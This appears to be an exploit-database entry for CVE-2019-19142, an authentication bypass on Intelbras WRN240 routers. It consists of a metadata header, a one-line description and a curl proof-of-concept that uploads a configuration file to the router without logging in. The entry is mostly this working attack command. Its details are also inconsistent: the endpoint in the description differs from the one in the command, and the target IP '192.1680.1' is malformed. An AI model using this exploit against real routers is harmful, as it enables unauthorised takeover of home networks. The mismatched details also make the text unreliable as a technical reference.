21 lines
No EOL
774 B
Text
21 lines
No EOL
774 B
Text
# Exploit Title: Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)
|
|
# Date: 2019-11-20
|
|
# Exploit Author: Elber Tavares
|
|
# Vendor Homepage: https://www.intelbras.com/
|
|
# Software Link: http://en.intelbras.com.br/node/1033
|
|
# Version: Intelbras Wireless N 150Mbps - WRN240
|
|
# Tested on: linux, windows
|
|
# CVE: CVE-2019-19142
|
|
|
|
Intelbras WRN240 devices do not require authentication to replace the
|
|
firmware via a POST request to the incoming/Firmware.cfg URI.
|
|
|
|
REFS:
|
|
https://fireshellsecurity.team/hack-n-routers/
|
|
https://github.com/ElberTavares/routers-exploit/
|
|
|
|
|
|
Poc:
|
|
curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer:
|
|
http://192.168.0.1/userRpm/BakNRestoreRpm.htm" -F data=@config.bin
|
|
http://192.1680.1/incoming/RouterBakCfgUpload.cfg |